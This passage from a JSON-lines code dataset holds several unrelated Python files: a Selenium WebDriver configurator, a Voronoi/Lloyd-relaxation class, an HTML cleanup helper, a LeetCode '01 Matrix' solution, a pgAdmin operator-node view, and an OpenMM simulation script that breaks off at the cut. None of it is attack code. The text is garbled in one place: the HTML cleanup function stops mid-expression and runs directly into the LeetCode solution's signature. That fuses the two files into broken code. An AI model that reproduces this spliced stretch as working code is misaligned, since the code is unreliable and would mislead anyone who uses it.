chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"ignore-errors:\"])\r\n chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"allow-running\"])\r\n chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-extensions\"])\r\n chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"proxy-server\"])\r\n chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"proxy-bypass\"])\r\n chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"maximized\"])\r\n chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-gpu\"])\r\n chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-dev\"])\r\n chromeoptions.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"no-sandbox\"])\r\n\r\n if page_load_strategy != \"default\":\r\n chromeoptions.page_load_strategy = page_load_strategy # Options: normal, eager, none\r\n\r\n return webdriver.Chrome(executable_path=ChromeDriverManager().install(), options=chromeoptions)\r\n else:\r\n return webdriver.Chrome(executable_path=ChromeDriverManager().install())\r\n\r\n if browser == 'firefox':\r\n\r\n if headless_browser == \"headless\":\r\n user_agent = config[\"HEADLESS_ARGUMENTS\"][\"user_agent\"]\r\n firefox_options = webdriver.FirefoxOptions()\r\n firefox_options.headless = True\r\n firefox_options.add_argument(f'user-agent={user_agent}')\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"window-size\"])\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"ignore-errors:\"])\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"allow-running\"])\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-extensions\"])\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"proxy-server\"])\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"proxy-bypass\"])\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"maximized\"])\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-gpu\"])\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"disable-dev\"])\r\n firefox_options.add_argument(config[\"HEADLESS_ARGUMENTS\"][\"no-sandbox\"])\r\n\r\n if page_load_strategy != \"default\":\r\n firefox_options.page_load_strategy = page_load_strategy # Options: normal, eager, none\r\n\r\n return webdriver.Firefox(executable_path=GeckoDriverManager().install(), options=firefox_options)\r\n else:\r\n return webdriver.Firefox(executable_path=GeckoDriverManager().install())\r\n\r\n if browser == 'opera':\r\n return webdriver.Opera(executable_path=OperaDriverManager().install())\r\n\r\n if browser == 'edge': # TODO: check for Windows < 8.1?\r\n edgedriver = EdgeChromiumDriverManager()\r\n return webdriver.Edge(edgedriver.install())\r\n\r\n @staticmethod\r\n def config_resolution(driver, resolucion):\r\n \"\"\"\r\n :config_resolution\r\n :param driver:\r\n :param resolucion:\r\n \"\"\"\r\n if resolucion == 'default':\r\n driver.maximize_window()\r\n else:\r\n ancho_alto = resolucion.split('x')\r\n ancho, alto = ancho_alto[0], ancho_alto[1]\r\n driver.set_window_size(ancho, alto)\r\n\r\n @staticmethod\r\n def loading_strategy(browser, page_load_strategy):\r\n \"\"\"\r\n :loading_strategy Defines the page loading strategy for the current session. By default, when\r\n Selenium WebDriver loads a page, it follows the normal page loading strategy. It is recommended to stop\r\n downloading of additional resources (such as images, css, js) when the page load takes a long time.\r\n a long time. By default, WebDriver will wait to respond to a driver.get() or driver.navigate().to() call\r\n until the document ready state is complete.\r\n :options 'normal'\r\n :options 'eager'\r\n :options 'none'\r\n :param page_load_strategy:\r\n :param browser: string de argumentos de lanzamiento principal\r\n :returns\r\n \"\"\"\r\n options = Options()\r\n\r\n if browser == 'chrome' or browser == 'default':\r\n return webdriver.Chrome(options=options)\r\n\r\n if browser == 'firefox':\r\n return webdriver.Firefox(options=options)\r\n\r\n if browser == 'opera':\r\n return webdriver.Opera(options=options)\r\n\r\n if browser == 'edge':\r\n return webdriver.Edge(options=options)\r\n","sub_path":"Part2_Automation/PythonVersion/Drivers/configDriver.py","file_name":"configDriver.py","file_ext":"py","file_size_in_byte":6810,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"334618930","text":"from scipy.spatial import Voronoi\nimport numpy as np\nimport sys\n\n\nclass Field():\n\n '''\n Create a Voronoi map that can be used to run Lloyd relaxation on an array of 2D points.\n For background, see: https://en.wikipedia.org/wiki/Lloyd%27s_algorithm\n '''\n\n def __init__(self, points=None):\n '''\n Store the points and bounding box of the points to which Lloyd relaxation will be applied\n @param [arr] points: a numpy array with shape n, 2, where n is number of points\n '''\n if not len(points):\n raise Exception('points should be a numpy array with shape n,2')\n\n x = points[:, 0]\n y = points[:, 1]\n self.bounding_box = [min(x), max(x), min(y), max(y)]\n self.points = points\n self.build_voronoi()\n\n def build_voronoi(self):\n '''\n Build a Voronoi map from self.points. For background on self.voronoi attrs, see:\n https://docs.scipy.org/doc/scipy-0.18.1/reference/generated/scipy.spatial.Voronoi.html\n '''\n eps = sys.float_info.epsilon\n self.voronoi = Voronoi(self.points, qhull_options=\"Qbb Qc Qz\")\n self.filtered_regions = [] # list of regions with vertices inside Voronoi map\n for region in self.voronoi.regions:\n inside_map = True # is this region inside the Voronoi map?\n for index in region: # index = the idx of a vertex in the current region\n\n # check if index is inside Voronoi map (indices == -1 are outside map)\n if index == -1:\n inside_map = False\n break\n\n # check if the current coordinate is in the Voronoi map's bounding box\n else:\n coords = self.voronoi.vertices[index]\n if not (self.bounding_box[0] - eps <= coords[0] and\n self.bounding_box[1] + eps >= coords[0] and\n self.bounding_box[2] - eps <= coords[1] and\n self.bounding_box[3] + eps >= coords[1]):\n inside_map = False\n break\n\n # store hte region if it has vertices and is inside Voronoi map\n if region != [] and inside_map:\n self.filtered_regions.append(region)\n\n\n def find_centroid(self, vertices):\n '''\n Find the centroid of a Voroni region described by `vertices`, and return a\n np array with the x and y coords of that centroid.\n The equation for the method used here to find the centroid of a 2D polygon\n is given here: https://en.wikipedia.org/wiki/Centroid#Of_a_polygon\n @params: np.array `vertices` a numpy array with shape n,2\n @returns np.array a numpy array that defines the x, y coords\n of the centroid described by `vertices`\n '''\n area = 0\n centroid_x = 0\n centroid_y = 0\n for i in range(len(vertices)-1):\n step = (vertices[i, 0] * vertices[i+1, 1]) - (vertices[i+1, 0] * vertices[i, 1])\n area += step\n centroid_x += (vertices[i, 0] + vertices[i+1, 0]) * step\n centroid_y += (vertices[i, 1] + vertices[i+1, 1]) * step\n area /= 2\n centroid_x = (1.0/(6.0*area)) * centroid_x\n centroid_y = (1.0/(6.0*area)) * centroid_y\n return np.array([[centroid_x, centroid_y]])\n\n def relax_points(self):\n '''\n Moves each point to the centroid of its cell in the Voronoi map to \"relax\"\n the points (i.e. jitter them so as to spread them out within the space).\n '''\n centroids = []\n for region in self.filtered_regions:\n vertices = self.voronoi.vertices[region + [region[0]], :]\n centroid = self.find_centroid(vertices) # get the centroid of these verts\n centroids.append(list(centroid[0]))\n\n self.points = centroids # store the centroids as the new point positions\n self.build_voronoi() # rebuild the voronoi map given new point positions\n","sub_path":"lloyd.py","file_name":"lloyd.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"375569010","text":"import logging\nfrom xml.etree import ElementTree\nfrom bs4 import BeautifulSoup\n\nlogger = logging.getLogger(__name__)\n\n\nclass CleanupTools:\n\n @staticmethod\n def cleanup_html(nodes):\n text = \"\"\n for node in nodes:\n html = ElementTree.tostring(node, encoding='utf-8', method='xml').decode('utf-8').replace(\"\\\\r\", \"\\n\")\n soup = BeautifulSoup(html, 'html.parser')\n if html.startswith(\" List[List[int]]:\n # print(len(mat), len(mat[0]))\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 1:\n mat[i][j] = 10 ** 5\n q = []\n for i in range(len(mat)):\n for j in range(len(mat[0])):\n if mat[i][j] == 0:\n q.append((i, j, 0))\n\n directions = [(0, -1), (-1, 0), (0, 1), (1, 0)]\n visited = [[0 for _ in range(len(mat[0]))] for __ in range(len(mat))]\n while len(q) > 0:\n x, y, depth = q[0]\n # print(x, y)\n # visited[x][y] = 1\n for step_x, step_y in directions:\n next_x = x + step_x\n next_y = y + step_y\n if 0 <= next_x < len(mat) and 0 <= next_y < len(mat[0]):\n if mat[next_x][next_y] != 0:\n mat[next_x][next_y] = min(mat[next_x][next_y], depth + 1)\n if visited[next_x][next_y] == 0:\n q.append((next_x, next_y, depth + 1))\n visited[next_x][next_y] = 1\n q = q[1:]\n return mat\n\nif __name__ == '__main__':\n sol = Solution()\n n = 10 ** 2\n m = 10 ** 2\n mat = [[1 for _ in range(m)] for __ in range(n)]\n mat[0][0] = 0\n # print(mat)\n mat = sol.updateMatrix(mat)\n print(mat)\n\n","sub_path":"source code/542. 01 Matrix.py","file_name":"542. 01 Matrix.py","file_ext":"py","file_size_in_byte":1552,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"588707600","text":"##########################################################################\n#\n# pgAdmin 4 - PostgreSQL Tools\n#\n# Copyright (C) 2013 - 2023, The pgAdmin Development Team\n# This software is released under the PostgreSQL Licence\n#\n##########################################################################\n\n\"\"\" Implements Operator Node \"\"\"\n\nfrom functools import wraps\n\nfrom flask import render_template\nfrom flask_babel import gettext\n\nimport pgadmin.browser.server_groups.servers.databases as database\nfrom config import PG_DEFAULT_DRIVER\nfrom pgadmin.browser.server_groups.servers.databases.schemas.utils \\\n import SchemaChildModule\nfrom pgadmin.browser.utils import PGChildNodeView\nfrom pgadmin.utils.ajax import make_json_response, internal_server_error, \\\n make_response as ajax_response, gone\nfrom pgadmin.utils.compile_template_name import compile_template_path\nfrom pgadmin.utils.driver import get_driver\n\n\nclass OperatorModule(SchemaChildModule):\n \"\"\"\n class OperatorModule(SchemaChildModule)\n\n A module class for Operator node derived from SchemaChildModule.\n\n Methods:\n -------\n * __init__(*args, **kwargs)\n - Method is used to initialize the Operator and it's base module.\n\n * get_nodes(gid, sid, did, scid, opid)\n - Method is used to generate the browser collection node.\n\n * node_inode()\n - Method is overridden from its base class to make the node as leaf node.\n\n * script_load()\n - Load the module script for schema, when any of the server node is\n initialized.\n \"\"\"\n\n _NODE_TYPE = 'operator'\n _COLLECTION_LABEL = gettext(\"Operators\")\n\n def __init__(self, *args, **kwargs):\n \"\"\"\n Method is used to initialize the OperatorModule and it's base module.\n\n Args:\n *args:\n **kwargs:\n \"\"\"\n\n super().__init__(*args, **kwargs)\n self.min_ver = 90100\n self.max_ver = None\n\n def get_nodes(self, gid, sid, did, scid):\n \"\"\"\n Generate the collection node\n \"\"\"\n if self.has_nodes(sid, did, scid=scid,\n base_template_path=OperatorView.BASE_TEMPLATE_PATH):\n yield self.generate_browser_collection_node(scid)\n\n @property\n def script_load(self):\n \"\"\"\n Load the module script for database, when any of the database node is\n initialized.\n \"\"\"\n return database.DatabaseModule.node_type\n\n @property\n def node_inode(self):\n return False\n\n\nblueprint = OperatorModule(__name__)\n\n\nclass OperatorView(PGChildNodeView):\n \"\"\"\n This class is responsible for generating routes for Operator node\n\n Methods:\n -------\n * __init__(**kwargs)\n - Method is used to initialize the OperatorView and it's base view.\n\n * check_precondition()\n - This function will behave as a decorator which will checks\n database connection before running view, it will also attaches\n manager,conn & template_path properties to self\n\n * list()\n - This function is used to list all the Operator nodes within that\n collection.\n\n * nodes()\n - This function will used to create all the child node within that\n collection, Here it will create all the Operator node.\n\n * properties(gid, sid, did, scid, opid)\n - This function will show the properties of the selected Operator node\n\n * sql(gid, sid, did, scid):\n - This function will generate sql to show it in sql pane for the\n selected Operator node.\n \"\"\"\n\n node_type = blueprint.node_type\n node_label = \"Operator\"\n BASE_TEMPLATE_PATH = 'operators/sql/#{0}#'\n\n parent_ids = [\n {'type': 'int', 'id': 'gid'},\n {'type': 'int', 'id': 'sid'},\n {'type': 'int', 'id': 'did'},\n {'type': 'int', 'id': 'scid'}\n ]\n ids = [\n {'type': 'int', 'id': 'opid'}\n ]\n\n operations = dict({\n 'obj': [\n {'get': 'properties', 'delete': 'delete', 'put': 'update'},\n {'get': 'list', 'post': 'create', 'delete': 'delete'}\n ],\n 'delete': [{'delete': 'delete'}, {'delete': 'delete'}],\n 'children': [{'get': 'children'}],\n 'nodes': [{'get': 'node'}, {'get': 'nodes'}],\n 'sql': [{'get': 'sql'}]\n })\n\n def check_precondition(f):\n \"\"\"\n This function will behave as a decorator which will checks\n database connection before running view, it will also attaches\n manager,conn & template_path properties to self\n \"\"\"\n\n @wraps(f)\n def wrap(*args, **kwargs):\n # Here args[0] will hold self & kwargs will hold gid,sid,did\n self = args[0]\n self.manager = get_driver(PG_DEFAULT_DRIVER).connection_manager(\n kwargs['sid']\n )\n self.conn = self.manager.connection(did=kwargs['did'])\n self.datistemplate = False\n if (\n self.manager.db_info is not None and\n kwargs['did'] in self.manager.db_info and\n 'datistemplate' in self.manager.db_info[kwargs['did']]\n ):\n self.datistemplate = self.manager.db_info[\n kwargs['did']]['datistemplate']\n\n # Set the template path for the SQL scripts\n self.template_path = \\\n self.BASE_TEMPLATE_PATH.format(self.manager.version)\n\n return f(*args, **kwargs)\n\n return wrap\n\n @check_precondition\n def list(self, gid, sid, did, scid):\n \"\"\"\n This function is used to list all the operator nodes within that\n collection.\n\n Args:\n gid: Server group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n\n Returns:\n JSON of available operator nodes\n \"\"\"\n\n SQL = render_template(\"/\".join([self.template_path,\n self._NODES_SQL]), scid=scid)\n status, res = self.conn.execute_dict(SQL)\n\n if not status:\n return internal_server_error(errormsg=res)\n return ajax_response(\n response=res['rows'],\n status=200\n )\n\n @check_precondition\n def nodes(self, gid, sid, did, scid):\n \"\"\"\n This function will used to create all the child node within that\n collection.\n Here it will create all the operator node.\n\n Args:\n gid: Server Group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n\n Returns:\n JSON of available operator child nodes\n \"\"\"\n\n res = []\n SQL = render_template(\"/\".join([self.template_path,\n self._NODES_SQL]), scid=scid)\n status, rset = self.conn.execute_2darray(SQL)\n if not status:\n return internal_server_error(errormsg=rset)\n\n for row in rset['rows']:\n res.append(\n self.blueprint.generate_browser_node(\n row['oid'],\n scid,\n row['name'],\n icon=\"icon-operator\",\n description=row['description']\n ))\n\n return make_json_response(\n data=res,\n status=200\n )\n\n @check_precondition\n def node(self, gid, sid, did, scid, opid):\n \"\"\"\n This function will fetch properties of the operator node.\n\n Args:\n gid: Server Group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n opid: Operator ID\n\n Returns:\n JSON of given operator node\n \"\"\"\n\n SQL = render_template(\"/\".join([self.template_path,\n self._NODES_SQL]), opid=opid)\n status, rset = self.conn.execute_2darray(SQL)\n if not status:\n return internal_server_error(errormsg=rset)\n\n for row in rset['rows']:\n return make_json_response(\n data=self.blueprint.generate_browser_node(\n row['oid'],\n scid,\n row['name'],\n icon=\"icon-operator\"\n ),\n status=200\n )\n\n return gone(self.not_found_error_msg())\n\n @check_precondition\n def properties(self, gid, sid, did, scid, opid):\n \"\"\"\n This function will show the properties of the selected operator node.\n\n Args:\n gid: Server Group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n scid: Schema ID\n opid: Operator ID\n\n Returns:\n JSON of selected operator node\n \"\"\"\n\n status, res = self._fetch_properties(scid, opid)\n if not status:\n return res\n\n return ajax_response(\n response=res,\n status=200\n )\n\n def _fetch_properties(self, scid, opid):\n \"\"\"\n This function fetch the properties for the specified object.\n\n :param scid: Schema ID\n :param opid: Operator ID\n \"\"\"\n\n SQL = render_template(\"/\".join([self.template_path,\n self._PROPERTIES_SQL]),\n scid=scid, opid=opid,\n datlastsysoid=self._DATABASE_LAST_SYSTEM_OID)\n status, res = self.conn.execute_dict(SQL)\n\n if not status:\n return False, internal_server_error(errormsg=res)\n\n if len(res['rows']) == 0:\n return False, gone(self.not_found_error_msg())\n\n res['rows'][0]['is_sys_obj'] = (\n res['rows'][0]['oid'] <= self._DATABASE_LAST_SYSTEM_OID or\n self.datistemplate)\n\n return True, res['rows'][0]\n\n @check_precondition\n def sql(self, gid, sid, did, scid, opid):\n \"\"\"\n This function will generates reverse engineered sql for operator\n object\n\n Args:\n gid: Server Group ID\n sid: Server ID\n did: Database ID\n scid: Schema ID\n opid: Operator ID\n json_resp: True then return json response\n \"\"\"\n\n SQL = render_template(\"/\".join([self.template_path,\n self._PROPERTIES_SQL]),\n scid=scid, opid=opid)\n status, res = self.conn.execute_dict(SQL)\n if not status:\n return internal_server_error(errormsg=res)\n if len(res['rows']) == 0:\n return gone(self.not_found_error_msg())\n\n data = res['rows'][0]\n\n SQL = render_template(\"/\".join([self.template_path,\n self._CREATE_SQL]),\n data=data)\n\n sql_header = \"-- Operator: {0};\\n\\n-- \".format(data['name'])\n\n sql_header += render_template(\"/\".join([self.template_path,\n self._DELETE_SQL]),\n name=data['name'],\n oprnamespace=data['schema'],\n lefttype=data['lefttype'],\n righttype=data['righttype'],\n )\n SQL = sql_header + '\\n' + SQL.strip('\\n')\n\n return ajax_response(response=SQL)\n\n\nOperatorView.register_node_view(blueprint)\n","sub_path":"web/pgadmin/browser/server_groups/servers/databases/schemas/operators/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":11425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"294901236","text":"#!/usr/bin/env python\nfrom __future__ import print_function\nimport math\n\nimport numpy as np\nimport parmed as pmd\nu = pmd.unit\n\nimport openmm as mm\nimport openmm.app as app\nfrom openmm.unit import *\nfrom openmm import *\nfrom openmm.app import *\n\nfrom argparse import ArgumentParser\nimport sys\n\ndef MTSVVVRIntegrator(temperature, collision_rate, timestep, system, ninnersteps=4):\n \"\"\"\n Create a multiple timestep velocity verlet with velocity randomization (VVVR) integrator.\n Taken from https://github.com/leeping/forcebalance, by Lee-Ping Wang\n \n ARGUMENTS\n\n temperature (Quantity compatible with kelvin) - the temperature\n collision_rate (Quantity compatible with 1/picoseconds) - the collision rate\n timestep (Quantity compatible with femtoseconds) - the integration timestep\n system (simtk.openmm.System) - system whose forces will be partitioned\n ninnersteps (int) - number of inner timesteps (default: 4)\n\n RETURNS\n\n integrator (openmm.CustomIntegrator) - a VVVR integrator\n\n NOTES\n \n This integrator is equivalent to a Langevin integrator in the velocity Verlet discretization with a\n timestep correction to ensure that the field-free diffusion constant is timestep invariant. The inner\n velocity Verlet discretization is transformed into a multiple timestep algorithm.\n\n REFERENCES\n\n VVVR Langevin integrator: \n * http://arxiv.org/abs/1301.3800\n * http://arxiv.org/abs/1107.2967 (to appear in PRX 2013) \n \n TODO\n\n Move initialization of 'sigma' to setting the per-particle variables.\n \n \"\"\"\n # Multiple timestep Langevin integrator.\n for i in system.getForces():\n if i.__class__.__name__ in [\"NonbondedForce\", \"CustomNonbondedForce\", \"AmoebaVdwForce\", \"AmoebaMultipoleForce\", \"MonteCarloBarostat\"]:\n # Slow force.\n print(' %s is a Slow Force' % i.__class__.__name__);\n # logger.info(i.__class__.__name__ + \" is a Slow Force\\n\")\n i.setForceGroup(1)\n else:\n # Fast force.\n print(' %s is a Fast Force' % i.__class__.__name__);\n # logger.info(i.__class__.__name__ + \" is a Fast Force\\n\")\n i.setForceGroup(0)\n\n kB = BOLTZMANN_CONSTANT_kB * AVOGADRO_CONSTANT_NA\n kT = kB * temperature\n \n integrator = CustomIntegrator(timestep)\n \n integrator.addGlobalVariable(\"dt_fast\", timestep/float(ninnersteps)) # fast inner timestep\n integrator.addGlobalVariable(\"kT\", kT) # thermal energy\n integrator.addGlobalVariable(\"a\", np.exp(-collision_rate*timestep)) # velocity mixing parameter\n integrator.addGlobalVariable(\"b\", np.sqrt((2/(collision_rate*timestep)) * np.tanh(collision_rate*timestep/2))) # timestep correction parameter\n integrator.addPerDofVariable(\"sigma\", 0) \n integrator.addPerDofVariable(\"x1\", 0) # position before application of constraints\n\n #\n # Pre-computation.\n # This only needs to be done once, but it needs to be done for each degree of freedom.\n # Could move this to initialization?\n #\n integrator.addComputePerDof(\"sigma\", \"sqrt(kT/m)\")\n\n # \n # Velocity perturbation.\n #\n integrator.addComputePerDof(\"v\", \"sqrt(a)*v + sqrt(1-a)*sigma*gaussian\")\n integrator.addConstrainVelocities();\n \n #\n # Symplectic inner multiple timestep.\n #\n integrator.addUpdateContextState(); \n integrator.addComputePerDof(\"v\", \"v + 0.5*b*dt*f1/m\")\n for innerstep in range(ninnersteps):\n # Fast inner symplectic timestep.\n integrator.addComputePerDof(\"v\", \"v + 0.5*b*dt_fast*f0/m\")\n integrator.addComputePerDof(\"x\", \"x + v*b*dt_fast\")\n integrator.addComputePerDof(\"x1\", \"x\")\n integrator.addConstrainPositions(); \n integrator.addComputePerDof(\"v\", \"v + 0.5*b*dt_fast*f0/m + (x-x1)/dt_fast\")\n integrator.addComputePerDof(\"v\", \"v + 0.5*b*dt*f1/m\") # TODO: Additional velocity constraint correction?\n integrator.addConstrainVelocities();\n\n #\n # Velocity randomization\n #\n integrator.addComputePerDof(\"v\", \"sqrt(a)*v + sqrt(1-a)*sigma*gaussian\")\n integrator.addConstrainVelocities();\n\n return integrator\n\nparser = ArgumentParser()\ngroup = parser.add_argument_group('Input File Options')\ngroup.add_argument('--xml', dest='xml', default='system.xml', metavar='FILE',\n help='''OpenMM System XML file. Default is %(default)s''')\ngroup.add_argument('-p', '--pdb', dest='pdb', metavar='', required=True,\n help='''PDB file with coordinates for all atoms. Is also the\n reference coordinates''')\ngroup.add_argument('-s', '--state', dest='state', metavar='FILE', default=None,\n help='''Restart file (any format)''')\ngroup = parser.add_argument_group('Positional Restraint Options')\ngroup.add_argument('--restrain', dest='restraints', metavar='MASK',\n help='restraint mask (default None)', default=None)\ngroup.add_argument('-k', '--force-constant', dest='force_constant', type=float,\n metavar='FLOAT', help='''Force constant for cartesian\n constraints. Default 10 kcal/mol/A^2''', default=10)\ngroup = parser.add_argument_group('Output File Options')\ngroup.add_argument('-r', '--restart', dest='restart', default='restart.nc',\n metavar='FILE', help='''NetCDF file with information to\n restart the simulation with another run''')\ngroup.add_argument('-o' , '--output', dest='output', default=sys.stdout,\n metavar='FILE', help='''Output file for energies''')\ngroup.add_argument('-x', '--trajectory', dest='trajectory', default='md.nc',\n metavar='FILE', help='''NetCDF trajectory to generate.\n Snapshots written every 10 * --interval steps.''')\ngroup.add_argument('--checkpoint', dest='checkpoint', metavar='FILE',\n default=None, help='''Name of a checkpoint file to write\n periodically throughout the simulation. Primarily useful for\n debugging intermittent and rare errors.''')\ngroup.add_argument('--interval', dest='interval', default=500, metavar='INT',\n help='Interval between printing state data. Default 500',\n type=int)\ngroup = parser.add_argument_group('Simulation Options')\ngroup.add_argument('-n', '--num-steps', dest='num_steps', required=True, type=int,\n help='Number of MD steps to run. Required', metavar='INT')\ngroup.add_argument('--ntp', dest='ntp', default=False, action='store_true',\n help='Do constant pressure simulation')\ngroup.add_argument('--aniso', dest='aniso', default=False, action='store_true',\n help='Do anisotropic pressure scaling')\ngroup.add_argument('--dt', dest='timestep', type=float,\n metavar='FLOAT', help='''time step for integrator (outer\n time-step for RESPA integrator) Default 1 fs''', default=1.0)\ngroup.add_argument('--tfreq', dest='tfreq', type=float,\n metavar='FLOAT', help='''frequency for Andersen thermostat.\n Default 0.1 ps^-1''', default=0.1)\ngroup.add_argument('--nrespa', dest='nrespa', type=int, metavar='INT',\n default=1, help='''Number of inner time steps to run\n (evaluating fast forces) for every outer timestep. Default is\n 1 (no RESPA). Best value to use for AMOEBA is at most 2. Only\n AMOEBA is supported.''')\ngroup.add_argument('--gamma_ln', dest='gamma_ln', type=float,\n metavar='FLOAT', help='''collision frequency for Langevin\n integrator. Default %(default)s ps-1''', default=0.0)\ngroup.add_argument('--temp', dest='temp', type=float,\n metavar='FLOAT', help='''target temperature for NVT\n simulation. Default %(default)s K''', default=300.0)\ngroup.add_argument('--nve', dest='nve', default=False, action='store_true',\n help='Do constant energy simulation')\ngroup.add_argument('--watch-for-errors', dest='hawkeye', default=False,\n action='store_true',\n help='''Watch energy every step and if energy becomes large\n or NaN, print out each component to find where the energy is\n blowing up. This may slow the simulation down considerably,\n so it is primarily of use when debugging.''')\n\nopt = parser.parse_args()\n\nprint('Command line:\\n\\t%s' % ' '.join(sys.argv)); sys.stdout.flush()\n\nprint('Parsing XML file %s' % opt.xml); sys.stdout.flush()\nwith open(opt.xml, 'r') as f:\n system = mm.XmlSerializer.deserialize(f.read())\n\nif opt.hawkeye:\n if opt.nrespa > 1:\n raise ValueError('Cannot use MTS integrator and watch for errors')\n groups_and_names = []\n for i, force in enumerate(system.getForces()):\n# if isinstance(force, mm.AmoebaMultipoleForce):\n# # Skip the multipole force, since it's so expensive\n# force.setForceGroup(20)\n# continue\n groups_and_names.append((type(force).__name__, i))\n force.setForceGroup(i)\n \n class ErrorDetectionReporter(app.StateDataReporter):\n def __init__(self, groups_and_names):\n self._reportInterval = 1\n self.groups_and_names = groups_and_names\n\n def describeNextReport(self, simulation):\n \"\"\"Get information about the next report this object will generate.\n \n Parameters\n ----------\n simulation : Simulation\n The Simulation to generate a report for\n \n Returns\n -------\n tuple\n A five element tuple. The first element is the number of steps\n until the next report. The remaining elements specify whether\n that report will require positions, velocities, forces, and\n energies respectively.\n \"\"\"\n return 1, False, False, False, True # only need energies\n\n def report(self, simulation, state):\n ene = state.getPotentialEnergy().value_in_unit(u.kilojoules_per_mole)\n if not math.isnan(ene) and ene < 1e5:\n return\n print('%30s %.6f kcal/mol' % ('Total Energy', ene))\n for name, i in self.groups_and_names:\n ene = simulation.context.getState(getEnergy=True, groups=1< 0.0:\n if opt.nrespa > 1:\n integrator = MTSVVVRIntegrator(opt.temp*u.kelvin,\n opt.gamma_ln/u.picosecond, opt.timestep*u.femtoseconds,\n system, opt.nrespa)\n print('MTSVVVR: %8.2fK, %8.2f ps-1, %8.2f fs, %3d inner steps' %\n (opt.temp, opt.gamma_ln, opt.timestep, opt.nrespa) ); sys.stdout.flush()\n else:\n integrator = mm.LangevinIntegrator(opt.temp*u.kelvin,\n opt.gamma_ln/u.picosecond, opt.timestep*u.femtoseconds)\n print('Langevin: %8.2fK, %8.2f ps-1, %8.2f fs' %\n (opt.temp, opt.gamma_ln, opt.timestep) ); sys.stdout.flush()\nelif opt.nrespa > 1:\n slow = (mm.AmoebaMultipoleForce, mm.AmoebaVdwForce,\n mm.AmoebaGeneralizedKirkwoodForce, mm.AmoebaWcaDispersionForce)\n found_slow = False\n for force in system.getForces():\n if isinstance(force, slow):\n found_slow = True\n force.setForceGroup(1)\n else:\n force.setForceGroup(0)\n if not found_slow:\n raise ValueError('No slow AMOEBA forces found for MTS integrator!')\n # The list given to MTSIntegrator defining the time steps and force\n # decompositions is a list of 2-element tuples where the first element is\n # a force group and the second element is how many times to evaluate that\n # force group each \"outer\" time-step. So [(0, opt.nrespa), (1, 1)] means\n # force group 0 is executed nrespa times each time step and force group 1 is\n # executed only once. The slow forces are defined above as force group 1 and\n # all others as force group 0.\n integrator = mm.MTSIntegrator(opt.timestep*u.femtoseconds,\n [(0, opt.nrespa), (1, 1)])\n print('RESPA MTS Integrator: %8.2f fs outer time-step with %d inner steps' %\n (opt.timestep, opt.nrespa))\nelse:\n integrator = mm.VerletIntegrator(opt.timestep*u.femtoseconds)\n print('Verlet: %8.2f fs' % opt.timestep )\n\nsim = app.Simulation(pdb.topology, system, integrator,\n platform=mm.Platform.getPlatformByName('CUDA'),\n platformProperties=dict(CudaPrecision='mixed') )\n\nif opt.hawkeye:\n # Watch every step... slow!\n sim.reporters.append(ErrorDetectionReporter(groups_and_names))\n\nsim.reporters.append(\n pmd.openmm.StateDataReporter(opt.output, reportInterval=opt.interval,\n volume=True,density=True,separator='\\t')\n)\nsim.reporters.append(\n pmd.openmm.ProgressReporter(opt.output + '.info', opt.interval, opt.num_steps)\n)\nsim.reporters.append(\n pmd.openmm.NetCDFReporter(opt.trajectory, opt.interval*10)\n)\nsim.reporters.append(\n pmd.openmm.RestartReporter(opt.restart, 99999999, netcdf=True)\n)\nif opt.checkpoint is not None:\n sim.reporters.append(\n app.CheckpointReporter(opt.checkpoint, opt.interval*10)\n )\n\nif opt.state is not None:\n print('Setting coordinates and velocities from restart file %s' %\n opt.state); sys.stdout.flush()\n\n if opt.state[-3:] == 'xml':\n with open(opt.state, 'r') as f:\n sim.context.setState(mm.XmlSerializer.deserialize(f.read()))\n elif opt.state[-3:] == 'chk':\n sim.loadCheckpoint(opt.state)\n else:\n# jason's code that is supposed to work for any restart file type:\n rst = pmd.load_file(opt.state)\n sim.context.setPositions(rst.coordinates[-1]*u.angstroms)\n sim.context.setVelocities(rst.velocities[-1]*u.angstroms/u.picoseconds)\n sim.context.setPeriodicBoxVectors(*pmd.geometry.box_lengths_and_angles_to_vectors(*rst.box))\n if hasattr(rst, 'time'):\n try:\n sim.context.setTime(rst.time[-1])\n except TypeError:\n sim.context.setTime(rst.time)\n\nelse:\n print('Setting coordinates from PDB file %s' % opt.pdb); sys.stdout.flush()\n sim.context.setPositions(pdb.positions)\n sim.context.setVelocitiesToTemperature(opt.temp)\n\nprint('Running the simulation for %d steps!' % opt.num_steps); sys.stdout.flush()\nsim.step(opt.num_steps)\n\n# The last step may not have resulted in a restart file being written. Force it\n# here\nstate = sim.context.getState(getPositions=True, getVelocities=True,\n getEnergy=True, getForces=True,\n 